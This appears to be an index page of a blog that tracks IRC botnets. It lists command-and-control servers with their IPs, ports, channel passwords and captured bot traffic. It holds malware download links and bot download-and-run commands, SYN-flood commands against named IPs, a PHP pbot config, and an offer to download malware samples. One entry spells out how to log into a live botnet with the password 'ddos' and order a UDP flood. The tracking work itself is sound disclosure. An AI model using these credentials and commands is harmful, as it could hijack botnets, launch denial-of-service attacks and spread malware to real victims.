This has so few bots I normally wouldn’t bother posting it, but I just think it’s funny that after being posted once, they haven’t even added a password. Resolved m74.zapto.org to 67.43.226.29 Server: m74.zapto.org Port: 6667 Current Global Users: 237 Max: 246 Channel: ##A## Bot: Athena Channel: ##I## Bot: Insomnia Channel: #j0r Bot: ngrBot Channel:Read more...
aminakoyim.co.cc(irc botnet hosted in Austria Graz Edis Gmbh)
Resolved : [aminakoyim.co.cc] To [158.255.211.248] server : aminakoyim.co.cc port:6667 PASS timu NICK n{Ganja-USA|XP}249666USER 2496 “” “TsGh” :2496JOIN #sanaLdarbE timuNICK {Ganja-USA|XP}280260USER 2802 “” “TsGh” :2802NICK {Ganja-USA|XP}394185USER 3941 “” “TsGh” :3941NICK {Ganja-USA|XP}737459USER 7374 “” “TsGh” :7374 Now talking in #sanaLdarbE Topic On: [ #sanaLdarbE ] [ ]Topic By: [ infeCTeD ] hosting infos: http://whois.domaintools.com/158.255.211.248
digested.maneradio.net(irc botnet hosted in Germany Karlsruhe 1&1 Internet Ag )
Resolved : [digested.maneradio.net] To [82.165.156.127] Download URLs hxxp://107.20.142.191/u/108730327/c.exe (dl.dropbox.com) hxxp://74.208.112.117:6/.x/heroi.exe C&C Server: 82.165.156.127:1866 Server Password: Username: hh Nickname: n[DEU|XP|DELL-D3E62F7E26]vddowpy Channel: #!h! (Password: ) Channeltopic: :.load /99/106/112/81/55/59/40/110/116/35/105/120/111/108/117/108/110/38/127/122/100/56/126/9/18/40/39/45/57/39/42/56/55/44/98/14/100/123/108/ Topic By: [ tx ] UPDATE: concerning a post from Anonymous guy i m adding this here with modifications to prevent accidental infections Here is a smoke bin iRead more...
ssl.pxnet.to (Insomnia hosted by Antarctica Voxility S.r.l.)
Resolved to ssl.pxnet.to to 109.163.234.180 Server: ssl.pxnet.to Port: 8888 Current Local Users: 301 Max: 888 Channel: #Frank Opers: [Hitler] (Hitler@Tracert1): Hitler [Hitler] #Frank [Hitler] flow.streamscene.to :! [Hitler] is a Network Administrator [Hitler] is available for help. [Hitler] idle 00:04:44, signon: Sat Sep 22 10:32:40 [Hitler] End of WHOIS list. [Fl00der] (Fl00der@gehaxelt-4FBCF4E0.gigabit.perfect-privacy.com): … [Fl00der] #Frank [Fl00der]Read more...
botnet.gen.tr(irc botnet hosted in Turkey Balikesir Turk Telekomunikasyon Anonim Sirketi)
Resolved : [botnet.gen.tr] To [88.255.116.47] Remote Host Port botnet.gen.tr 6667 Passwd secret Channels Now talking in #XXX Topic On: [ #XXX 12] [ 13 .html .lan .dwl hxxp://www.universe-bty.co.th/promina_images/MuTomyumZ_Full_V2.exe .visit hxxp://www.alizametal.com.tr/KCA.html ] Topic By: [ KCA ] [5:36](KCA) .visit hxxp://www.alizametal.com.tr/KCA.html ([iRooT-W7-USA]564523) hxxp://www.alizametal.com.tr/KCA.html Has Been Visited! ([iRooT-W7-USA]553377) hxxp://www.alizametal.com.tr/KCA.html Has Been Visited! Now talking in #x Topic On:Read more...
244mb samples
This is another package with diferent malware samples collected from me have fun with samples and dont forget only for research purposes Download
178.79.171.44(Linux pbots hosted in United Kingdom Leeds Linode Llc)
var $config = array("server"=>"178.79.171.44", "port"=>"5863", "pass"=>"", "prefix"=>"XxX|", "maxrand"=>"5", "chan"=>"#resident.evil", "chan2"=>"#resident.evil", "key"=>"", "modes"=>"+p", "password"=>"ddos", "trigger"=>".", "hostauth"=>"*" pbot source: <? /* * * NOGROD. since 2008 * IRC.UDPLINK.NET * * COMMANDS: * * .user <password> //login to the bot * .logout //logout of the bot * .die //kill the bot * .restart //restart the bot * .mailRead more...
vp.ksaxchat.net (ngrbot hosted by United States Chantilly Network Operations Center Inc)
vp.ksaxchat.net resolved to 64.191.37.206 Server: vp.ksaxchat.net Port: 6662 Channel: #ny Channel password: ngrBot Authhost: @nyg Opers: KV (inm@nyg) xE (XQ@nyg) kk Some floods: xE !ssyn 76.164.192.130 443 50 xE !ssyn 76.164.192.130 80 50 KV !ssyn 199.59.161.41 2000 3600 Hosting infos: http://whois.domaintools.com/64.191.37.206
nukebooter.no-ip.info (Ircbots hosted by United Kingdom Kendal Webfusion Internet Solutions)
Resolved nukebooter.no-ip.info to 92.60.118.183 Server: nukebooter.no-ip.info Port: 3179 Channel: #hostbooter# Nick: {RO|W7-32u}uahlzjr Channel: #XBL# Nick: [IND][7][36158] Channel: #overkill# Nick: [IND][7][36158] Channel: #Asper# Nick: [iNtoXiC|ITA|WIN7|1637196] Channel: #NukeBot# Nick: rzbxry Channel: #BotBank# Nick: [UnitedStates-English[UnitedSt Host: [Administrator] (Admin@ActivateBots): Administrator Also phpbots Visit http://freewebcamschats.com/cb.php, http://184.73.65.155/cb.php, http://www.tutorat-psy.fr/cb.php join #hostbooter# say .login ddos say .udpflood 92.60.118.183 3179 20 tada Hosting infos:Read more...
h.maqder.info(irc botnet hosted in United States Wisconsin Rapids Datawave Technologies Llc)
Resolved : [h.maqder.info] To [206.176.205.101] Remote Host Port Number h.maqder.info 3921 NICK GL-154325340 USER ianbryzrwyw 0 0 :GL-154325340 USERHOST GL-154325340 MODE GL-154325340 +x+i JOIN #n msspas’ NICK GL-142987297 USER epqnfvzbqyg 0 0 :GL-142987297 USERHOST GL-142987297 MODE GL-142987297 +x+i NICK GL-802428583 USER puyriaytwb 0 0 :GL-802428583 USERHOST GL-802428583 MODE GL-802428583 +x+i NICK GL-470192572 USER odzajtdpxck 0Read more...